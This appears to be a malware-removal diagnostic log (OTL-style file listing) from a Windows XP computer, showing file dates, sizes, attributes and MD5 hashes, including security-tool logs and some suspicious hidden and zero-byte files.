[2012/05/12 13:42:10 | 000,000,327 | RHS- | M] () -- C:\boot.ini
[2004/08/03 23:00:00 | 000,260,272 | RHS- | M] () -- C:\cmldr
[2012/05/12 19:47:07 | 000,281,162 | ---- | M] () -- C:\ComboFix.txt
[2009/08/03 13:28:56 | 000,000,000 | ---- | M] () -- C:\CONFIG.SYS
[2012/05/13 11:18:17 | 000,000,354 | ---- | M] () -- C:\Estigma.hta
[2012/05/13 11:01:16 | 1063,317,504 | -HS- | M] () -- C:\hiberfil.sys
[2011/11/07 13:56:26 | 006,480,192 | ---- | M] (SurfRight B.V.) -- C:\HitmanPro35.exe
[2009/08/03 13:28:56 | 000,000,000 | RHS- | M] () -- C:\IO.SYS
[2012/01/17 18:28:42 | 000,003,410 | ---- | M] () -- C:\lists.txt
[2011/07/24 23:05:27 | 009,466,208 | ---- | M] (Malwarebytes Corporation ) -- C:\mbam-setup-1.51.1.1800.exe
[2009/07/27 04:09:36 | 000,002,040 | ---- | M] () -- C:\MOD01SET0J00P2000Z.enc
[2009/03/12 02:49:57 | 000,002,508 | ---- | M] () -- C:\MOD01WOS02E1P20001.enc
[2009/08/03 13:28:56 | 000,000,000 | RHS- | M] () -- C:\MSDOS.SYS
[2008/04/14 08:00:00 | 000,047,564 | RHS- | M] () -- C:\NTDETECT.COM
[2008/04/14 08:00:00 | 000,250,048 | RHS- | M] () -- C:\ntldr
[2012/05/13 11:01:15 | 1598,029,824 | -HS- | M] () -- C:\pagefile.sys
[2009/08/03 15:18:45 | 000,001,885 | ---- | M] () -- C:\RHDSetup.log
[2011/07/24 23:09:17 | 016,409,960 | ---- | M] (Safer Networking Limited ) -- C:\spybotsd162.exe
[2012/05/13 12:01:10 | 000,084,470 | ---- | M] () -- C:\TDSSKiller.2.7.34.0_13.05.2012_11.48.02_log.txt
[2011/07/24 23:07:04 | 001,383,430 | ---- | M] () -- C:\tdsskiller.zip
[2011/05/04 01:05:03 | 000,000,054 | ---- | M] () -- C:\TEST.ini
[2012/03/01 01:22:07 | 000,000,237 | ---- | M] () -- C:\user.js
[2011/05/04 00:00:22 | 000,000,167 | ---- | M] () -- C:\Webcam.log

< %USERPROFILE%\*.* >
[2011/12/06 02:45:19 | 000,063,488 | ---- | M] () -- C:\Documents and Settings\Annie\ABCNBDAD
[2012/05/13 11:16:15 | 000,063,488 | ---- | M] () -- C:\Documents and Settings\Annie\ALBAAPDI
[2012/05/12 23:25:36 | 007,077,888 | ---- | M] () -- C:\Documents and Settings\Annie\ntuser.dat
[2012/05/13 12:18:23 | 000,001,024 | -H-- | M] () -- C:\Documents and Settings\Annie\ntuser.dat.LOG
[2012/05/12 23:25:36 | 000,000,178 | -HS- | M] () -- C:\Documents and Settings\Annie\ntuser.ini
[2012/05/05 11:43:13 | 000,006,227 | ---- | M] () -- C:\Documents and Settings\Annie\reset.log

< %USERPROFILE%\Application Data\*.* >
[2009/08/03 09:23:53 | 000,000,062 | -HS- | M] () -- C:\Documents and Settings\Annie\Application Data\desktop.ini

< %USERPROFILE%\Local Settings\Application Data\*.* >
[2011/07/24 22:48:01 | 000,002,976 | -HS- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\2w5cl4dh4n20b1k
[2012/01/08 06:26:29 | 000,004,068 | -HS- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
[2011/07/30 17:56:23 | 000,002,506 | -HS- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\8w1q6yk7g38oh2v5al00mcc5270
[2012/05/12 22:43:53 | 000,133,632 | ---- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini
[2012/01/26 11:48:18 | 000,098,088 | ---- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\GDIPFONTCACHEV1.DAT
[2012/05/12 23:25:28 | 005,850,994 | -H-- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\IconCache.db
[2011/07/29 22:30:56 | 000,001,476 | -HS- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\pb34h3q1wypq8y6bh452
[2011/07/31 13:54:05 | 000,001,424 | -HS- | M] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x

< %AllUsersProfile%\*.* >
[2011/05/03 23:57:30 | 000,262,144 | ---- | M] () -- C:\Documents and Settings\All Users\NTUSER.DAT
[2012/05/12 19:23:24 | 000,001,024 | -H-- | M] () -- C:\Documents and Settings\All Users\NTUSER.DAT.LOG

< %AllUsersProfile%\Application Data\*.* >
[2011/07/24 22:48:01 | 000,002,976 | -HS- | M] () -- C:\Documents and Settings\All Users\Application Data\2w5cl4dh4n20b1k
[2012/01/08 06:26:29 | 000,004,068 | -HS- | M] () -- C:\Documents and Settings\All Users\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
[2011/07/30 17:56:23 | 000,002,506 | -HS- | M] () -- C:\Documents and Settings\All Users\Application Data\8w1q6yk7g38oh2v5al00mcc5270
[2011/07/31 13:54:04 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\bvbt.exe
[2009/08/03 09:23:53 | 000,000,062 | -HS- | M] () -- C:\Documents and Settings\All Users\Application Data\desktop.ini
[2011/07/29 22:30:52 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\ejbt.exe
[2011/07/29 22:30:52 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\fnqu.exe
[2011/07/31 13:54:04 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\foph.exe
[2011/07/29 22:30:52 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\jbpy.exe
[2011/07/31 13:54:04 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\lrgv.exe
[2011/07/31 13:54:04 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\mkbr.exe
[2011/07/29 22:30:56 | 000,001,476 | -HS- | M] () -- C:\Documents and Settings\All Users\Application Data\pb34h3q1wypq8y6bh452
[2011/07/31 13:54:05 | 000,001,424 | -HS- | M] () -- C:\Documents and Settings\All Users\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x
[2011/07/29 22:30:52 | 000,000,000 | ---- | M] () -- C:\Documents and Settings\All Users\Application Data\wshs.exe

< %USERPROFILE%\My Documents\*.* >
[2011/06/21 13:53:02 | 000,343,735 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\13-cis Retinoic Acid Induces Apoptosis and Cell Cycle Arrest in Human SEB-1 Sebocytes.PDF
[2011/06/21 13:35:57 | 000,551,357 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\accutane1.PDF
[2011/06/21 13:40:22 | 001,481,725 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\Accutane2.PDF
[2011/06/21 13:48:45 | 000,411,913 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\Accutane3.PDF
[2011/04/03 03:14:26 | 000,050,689 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\astro_w2gw_01_annie_hp.15215.18556.gif
[2011/04/03 03:15:58 | 000,056,807 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\astro_w2gw_01_annie_hp.15347.20005.pdf
[2011/05/03 23:59:03 | 000,000,076 | -HS- | M] () -- C:\Documents and Settings\Annie\My Documents\desktop.ini
[2011/06/21 13:56:05 | 000,691,581 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\Differentiation and Apoptosis in Human Immortalized Sebocytes.PDF
[2011/05/29 00:04:49 | 000,745,964 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\eduroam.PDF
[2011/11/30 14:10:03 | 001,720,716 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\included.xlsx
[2011/06/21 13:53:28 | 000,091,498 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\Isotretinoin Revisited- Pluripotent Effects on Human Sebaceous Gland Cells.PDF
[2011/06/21 13:54:01 | 002,407,108 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\Isotretinoin Temporally Regulates Distinct Sets of Genes in Patient Skin.PDF
[2011/07/20 23:51:41 | 000,005,632 | -HS- | M] () -- C:\Documents and Settings\Annie\My Documents\Thumbs.db
[2011/06/21 13:55:04 | 002,216,511 | ---- | M] () -- C:\Documents and Settings\Annie\My Documents\Towards Dissecting the Pathogenesis of Retinoid-Induced Hair Loss All-Trans Retinoic Acid Induces Premature Hair Follicle Regression (Catagen) by Upregulation of Transforming Growth Factor-β2 in the Dermal Papilla

< %CommonProgramFiles%\*.* >

< %PROGRAMFILES%\*.* >

< %systemroot%\system32\config\systemprofile\*.* >
[2011/05/03 23:50:50 | 000,262,144 | ---- | M] () -- C:\WINDOWS\system32\config\systemprofile\ntuser.dat
[2012/05/12 13:33:00 | 000,001,024 | -H-- | M] () -- C:\WINDOWS\system32\config\systemprofile\NTUSER.DAT.LOG

< %windir%\ServiceProfiles\LocalService\AppData\Local\Temp\*.* >

< %windir%\ServiceProfiles\NetworkService\AppData\Local\Temp\*.* >

< %windir%\temp*.* >

< %windir%\system32\*. >
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1025
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1028
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1031
[2009/08/03 09:18:02 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1033
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1037
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1041
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1042
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\1054
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\2052
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\3076
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\3com_dmi
[2011/10/18 06:44:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Adobe
[2009/08/03 15:18:55 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Atheros_L1e
[2011/07/09 10:08:25 | 000,000,000 | -H-D | M] -- C:\WINDOWS\system32\CanonIJ Uninstaller Information
[2012/05/12 20:12:36 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\CatRoot
[2012/05/13 11:14:14 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\CatRoot2
[2009/08/03 13:27:10 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Com
[2012/05/12 13:38:54 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\config
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\dhcp
[2009/08/03 15:36:51 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\DirectX
[2012/05/13 11:18:05 | 000,000,000 | RHSD | M] -- C:\WINDOWS\system32\dllcache
[2012/05/13 11:48:02 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\drivers
[2012/01/25 17:21:53 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\DRVSTORE
[2009/08/03 09:23:23 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\en
[2011/06/13 16:12:18 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\en-US
[2009/08/03 15:10:22 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\ENU
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\export
[2012/03/17 14:29:00 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\FxsTmp
[2009/08/03 13:28:25 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\ias
[2009/08/03 09:18:19 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\icsxml
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\IME
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\inetsrv
[2009/08/03 15:10:21 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Lang
[2011/09/08 16:04:08 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\LogFiles
[2011/10/18 06:44:54 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Macromed
[2009/08/03 13:31:41 | 000,000,000 | --SD | M] -- C:\WINDOWS\system32\Microsoft
[2009/08/03 13:27:03 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\MsDtc
[2009/08/03 13:32:33 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\mui
[2009/08/03 09:21:47 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\npp
[2009/08/03 15:37:45 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\OEM
[2009/08/03 15:18:02 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\oobe
[2009/08/03 09:18:50 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\ras
[2011/05/04 00:00:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\ReinstallBackups
[2011/07/24 22:29:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Restore
[2009/08/03 15:18:29 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\RTCOM
[2009/08/03 09:23:23 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\scripting
[2009/08/03 09:22:08 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\Setup
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\ShellExt
[2011/06/13 16:11:48 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\spool
[2009/08/03 13:32:54 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\URTTemp
[2009/08/03 09:23:23 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\usmt
[2012/05/12 13:38:37 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\wbem
[2009/08/03 09:17:40 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\wins
[2009/08/03 13:29:01 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\xircom
[2011/06/13 16:12:22 | 000,000,000 | ---D | M] -- C:\WINDOWS\system32\XPSViewer

< %systemroot%\system32\*.dll /lockedfiles >
[1 C:\WINDOWS\system32\*.tmp files -> C:\WINDOWS\system32\*.tmp -> ]

< %systemroot%\Tasks\*.job /lockedfiles >

< %systemroot%\system32\drivers\*.sys /90 >

< %systemroot%\system32\drivers\*.sys /lockedfiles >

< %systemroot%\system32\Spool\prtprocs\w32x86\*.dll >
[2010/08/25 05:00:00 | 000,027,648 | ---- | M] (CANON INC.) -- C:\WINDOWS\system32\Spool\prtprocs\w32x86\CNMPDAA.DLL
[2010/08/25 05:00:00 | 000,073,216 | ---- | M] (CANON INC.) -- C:\WINDOWS\system32\Spool\prtprocs\w32x86\CNMPPAA.DLL
[2008/07/06 08:06:10 | 000,089,088 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Spool\prtprocs\w32x86\filterpipelineprintproc.dll
[2006/10/26 19:56:12 | 000,033,104 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\system32\Spool\prtprocs\w32x86\msonpppr.dll

< %systemroot%\*. /rp /s >

< %systemroot%\assembly\tmp\*.* /S /MD5 >

< %systemroot%\assembly\temp\*.* /S /MD5 >

< %systemroot%\assembly\GAC_32\*.* /S /MD5 >
[2011/05/18 19:04:06 | 000,064,000 | ---- | M] () MD5=AEE629029E04E11301668DD5D259F5C8 -- C:\WINDOWS\assembly\GAC_32\cli_cppuhelper\1.0.21.0__ce2cb7e279207b9e\cli_cppuhelper.dll
[2011/06/13 16:10:02 | 000,069,120 | ---- | M] () MD5=DC426A365577F27187F99EB506ECD5D1 -- C:\WINDOWS\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll
[2011/06/13 16:10:05 | 000,072,192 | ---- | M] () MD5=29B35A999E341A37BE67771BE01CC275 -- C:\WINDOWS\assembly\GAC_32\ISymWrapper\2.0.0.0__b03f5f7f11d50a3a\ISymWrapper.dll
[2011/06/13 16:12:08 | 000,163,840 | ---- | M] () MD5=36BDD82A92AA704034475C2DEF7FBD29 -- C:\WINDOWS\assembly\GAC_32\Microsoft.Transactions.Bridge.Dtc\3.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.Dtc.dll
[2011/06/13 16:10:13 | 000,066,728 | ---- | M] () MD5=C01B81BB10AD14DBC5C4ECD350638096 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\big5.nlp
[2011/06/13 16:10:13 | 000,082,172 | ---- | M] () MD5=EE1F60F8774D74BED8B13498F3FE737A -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bopomofo.nlp
[2011/06/13 16:10:13 | 000,116,756 | ---- | M] () MD5=F6DFDA5A31162D848634504565F6D321 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\ksc.nlp
[2011/06/13 16:10:13 | 004,546,560 | ---- | M] () MD5=0E6ABF2107C72F5FA86EE620BE315CA0 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll
[2011/06/13 16:10:13 | 000,059,342 | ---- | M] () MD5=DA5748A89E22A3932387E65694B25BBB -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normidna.nlp
[2011/06/13 16:10:13 | 000,045,794 | ---- | M] () MD5=3831A5E217D6FA828CCE1011DA26E677 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfc.nlp
[2011/06/13 16:10:13 | 000,039,284 | ---- | M] () MD5=DBDE664E0BA4BACD0A6A04AE2232B205 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfd.nlp
[2011/06/13 16:10:13 | 000,066,384 | ---- | M] () MD5=C9B88B759FE81D59CE8EBF5A0A8EB75A -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfkc.nlp
[2011/06/13 16:10:13 | 000,060,294 | ---- | M] () MD5=3CAB6AB66759FCDF73B61EE262C9ACF4 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\normnfkd.nlp
[2011/06/13 16:10:13 | 000,083,748 | ---- | M] () MD5=54144F43EDF5AA8F504A30E7C1D1A7B5 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\prc.nlp
[2011/06/13 16:10:13 | 000,083,748 | ---- | M] () MD5=901863C68E6523336CAC602FE9320ABC -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\prcp.nlp
[2011/06/13 16:10:13 | 000,262,148 | ---- | M] () MD5=FB59D247F7143C3B9683A547E808A88B -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
[2011/06/13 16:10:13 | 000,020,320 | ---- | M] () MD5=FF13BA175F0013D2311827E0D438C60B -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
[2011/06/13 16:10:13 | 000,028,288 | ---- | M] () MD5=09E420F90A329BDA68477FA4AF43CB28 -- C:\WINDOWS\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\xjis.nlp
[2011/05/18 19:04:12 | 000,000,382 | ---- | M] () MD5=3BAF2A374186AB711B5A34EE5B2F44EC -- C:\WINDOWS\assembly\GAC_32\policy.1.0.cli_cppuhelper\21.0.0.0__ce2cb7e279207b9e\cli_cppuhelper.config
[2011/05/18 19:04:11 | 000,003,072 | ---- | M] () MD5=1559D82D88D5A0CA92EF9B173EDAB795 -- C:\WINDOWS\assembly\GAC_32\policy.1.0.cli_cppuhelper\21.0.0.0__ce2cb7e279207b9e\policy.1.0.cli_cppuhelper.dll
[2011/06/13 16:12:12 | 004,210,688 | ---- | M] () MD5=A9D42B0504EAE68C4D45692F019B543A -- C:\WINDOWS\assembly\GAC_32\PresentationCore\3.0.0.0__31bf3856ad364e35\PresentationCore.dll
[2011/06/13 16:10:12 | 000,486,400 | ---- | M] () MD5=B2EDA351AB2DEE6F0CE95B38F8BFA0D5 -- C:\WINDOWS\assembly\GAC_32\System.Data.OracleClient\2.0.0.0__b77a5c561934e089\System.Data.OracleClient.dll
[2011/06/13 16:10:14 | 002,933,248 | ---- | M] () MD5=16F96C1496CBD0965285AB19A9271D02 -- C:\WINDOWS\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll
[2011/06/13 16:10:11 | 000,258,048 | ---- | M] () MD5=9631B15DB7C43C267636FF43C3075E07 -- C:\WINDOWS\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.dll
[2011/06/13 16:10:11 | 000,113,664 | ---- | M] () MD5=E786C33D35D39C5CCB523AECC18D7BD7 -- C:\WINDOWS\assembly\GAC_32\System.EnterpriseServices\2.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll
[2011/06/13 16:12:14 | 000,368,640 | ---- | M] () MD5=34FA631FAA4B2DF8C0A92B7B5AD9D6E1 -- C:\WINDOWS\assembly\GAC_32\System.Printing\3.0.0.0__31bf3856ad364e35\System.Printing.dll
[2011/06/13 16:10:07 | 000,261,632 | ---- | M] () MD5=F054572A92573CA32D5F3AA8C15D2BAC -- C:\WINDOWS\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll
[2011/06/13 16:09:55 | 005,238,784 | ---- | M] () MD5=4D041993C3728B5924039E69074F238C -- C:\WINDOWS\assembly\GAC_32\System.Web\2.0.0.0__b03f5f7f11d50a3a\System.Web.dll

< %systemroot%\assembly\GAC_MSIL\*.* /S /MD5 >
[2011/06/13 16:10:01 | 000,010,752 | ---- | M] () MD5=A5A56B4957BD59D324821522FE14F751 -- C:\WINDOWS\assembly\GAC_MSIL\Accessibility\2.0.0.0__b03f5f7f11d50a3a\Accessibility.dll
[2011/06/13 16:09:56 | 000,507,904 | ---- | M] () MD5=B8FE2350B2236EE3D1CECA34E0C0FF17 -- C:\WINDOWS\assembly\GAC_MSIL\AspNetMMCExt\2.0.0.0__b03f5f7f11d50a3a\AspNetMMCExt.dll
[2011/05/18 19:03:46 | 000,011,264 | ---- | M] () MD5=8AF24227572664D76599F05A2139CA55 -- C:\WINDOWS\assembly\GAC_MSIL\cli_basetypes\1.0.18.0__ce2cb7e279207b9e\cli_basetypes.dll
[2011/05/18 19:04:06 | 000,892,928 | ---- | M] () MD5=75C68BE52B2B941B3E5C83CB8D744A04 -- C:\WINDOWS\assembly\GAC_MSIL\cli_oootypes\1.0.7.0__ce2cb7e279207b9e\cli_oootypes.dll
[2011/05/18 19:03:46 | 000,007,680 | ---- | M] () MD5=C5A6D7B163BCF83CF7433E2F00CFF1D0 -- C:\WINDOWS\assembly\GAC_MSIL\cli_ure\1.0.21.0__ce2cb7e279207b9e\cli_ure.dll
[2011/05/18 19:03:47 | 000,118,784 | ---- | M] () MD5=1A8D7B1BE5FA2C1F83C5C139823F3EAC -- C:\WINDOWS\assembly\GAC_MSIL\cli_uretypes\1.0.7.0__ce2cb7e279207b9e\cli_uretypes.dll
[2011/06/13 16:10:01 | 000,013,312 | ---- | M] () MD5=107F49F1BF0FB27A6CD758EB8C4D95A0 -- C:\WINDOWS\assembly\GAC_MSIL\cscompmgd\8.0.0.0__b03f5f7f11d50a3a\cscompmgd.dll
[2011/06/13 16:10:02 | 000,008,192 | ---- | M] () MD5=6CD7461E06CB8BAEE3B16C3D7F637CD0 -- C:\WINDOWS\assembly\GAC_MSIL\IEExecRemote\2.0.0.0__b03f5f7f11d50a3a\IEExecRemote.dll
[2011/06/13 16:10:02 | 000,077,824 | ---- | M] () MD5=24F0385D06BD86A97412B8905483313E -- C:\WINDOWS\assembly\GAC_MSIL\IEHost\2.0.0.0__b03f5f7f11d50a3a\IEHost.dll
[2011/06/13 16:10:03 | 000,006,656 | ---- | M] () MD5=11F3AC2D47E566615819F5BF0DD18379 -- C:\WINDOWS\assembly\GAC_MSIL\IIEHost\2.0.0.0__b03f5f7f11d50a3a\IIEHost.dll
[2011/06/13 16:13:07 | 000,106,496 | ---- | M] () MD5=29CED3B606BA7E2B49E52931C5CB53B7 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Conversion.v3.5\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Conversion.v3.5.dll
[2011/06/13 16:10:09 | 000,348,160 | ---- | M] () MD5=996AAEEC01C734347DE8A72542FD1C12 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Engine\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll
[2011/06/13 16:13:08 | 000,733,184 | ---- | M] () MD5=31C6E94759BF4D2FBE3239FFA717967D -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Engine\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Engine.dll
[2011/06/13 16:10:09 | 000,036,864 | ---- | M] () MD5=D2A1C3150E43738BAB3D0AD9921B3E50 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Framework\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll
[2011/06/13 16:13:08 | 000,036,864 | ---- | M] () MD5=17C6F3F73858732DE59D6D957958E9AF -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Framework\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll
[2011/06/13 16:13:09 | 000,802,816 | ---- | M] () MD5=37F17D4698086C90127BBD90E73D7FE2 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Tasks.v3.5\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Tasks.v3.5.dll
[2011/06/13 16:10:10 | 000,655,360 | ---- | M] () MD5=8A3F5B72C3F402C8D33027A4C77F55AC -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Tasks\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Tasks.dll
[2011/06/13 16:13:09 | 000,094,208 | ---- | M] () MD5=E32A06F647517D0DEA80F29B459E8FA2 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Utilities.v3.5\3.5.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.v3.5.dll
[2011/06/13 16:10:11 | 000,077,824 | ---- | M] () MD5=640BF6BB259B53BEFF59135645C63B18 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Build.Utilities\2.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Utilities.dll
[2011/06/13 16:10:05 | 000,749,568 | ---- | M] () MD5=EB535D00C508119EEE4042B737165A3B -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.JScript\8.0.0.0__b03f5f7f11d50a3a\Microsoft.JScript.dll
[2011/06/13 16:12:08 | 000,397,312 | ---- | M] () MD5=66F6B3248D6C39CEFA49174133A694FE -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.Transactions.Bridge\3.0.0.0__b03f5f7f11d50a3a\Microsoft.Transactions.Bridge.dll
[2011/06/13 16:10:04 | 000,110,592 | ---- | M] () MD5=D676BC7C829F86A215676281A1032C6B -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.VisualBasic.Compatibility.Data\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Compatibility.Data.dll
[2011/06/13 16:10:04 | 000,372,736 | ---- | M] () MD5=226956F70AEBBBF5ACBC9ADA6522B6F6 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.VisualBasic.Compatibility\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Compatibility.dll
[2011/06/13 16:10:07 | 000,028,672 | ---- | M] () MD5=3D61BFCBE13C2DC8F5AE20BF02145322 -- C:\WINDOWS\assembly\GAC_MSIL\Microsoft.VisualBasic.Vsa\8.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.Vsa.dll

< MD5 for: EXPLORER.EXE >
[2008/04/14 08:00:00 | 001,033,728 | ---- | M] (Microsoft Corporation) MD5=12896823FB95BFB3DC9B46BCAEDC9923 -- C:\WINDOWS\ERDNT\cache\explorer.exe
[2008/04/14 08:00:00 | 001,033,728 | ---- | M] (Microsoft Corporation) MD5=12896823FB95BFB3DC9B46BCAEDC9923 -- C:\WINDOWS\explorer.exe
[2008/04/14 08:00:00 | 001,033,728 | ---- | M] (Microsoft Corporation) MD5=12896823FB95BFB3DC9B46BCAEDC9923 -- C:\WINDOWS\system32\dllcache\explorer.exe

< MD5 for: IPSEC.SYS >
[2008/04/14 08:00:00 | 000,075,264 | ---- | M] (Microsoft Corporation) MD5=23C74D75E36E7158768DD63D92789A91 -- C:\WINDOWS\ERDNT\cache\ipsec.sys
[2008/04/14 08:00:00 | 000,075,264 | ---- | M] (Microsoft Corporation) MD5=23C74D75E36E7158768DD63D92789A91 -- C:\WINDOWS\system32\dllcache\ipsec.sys
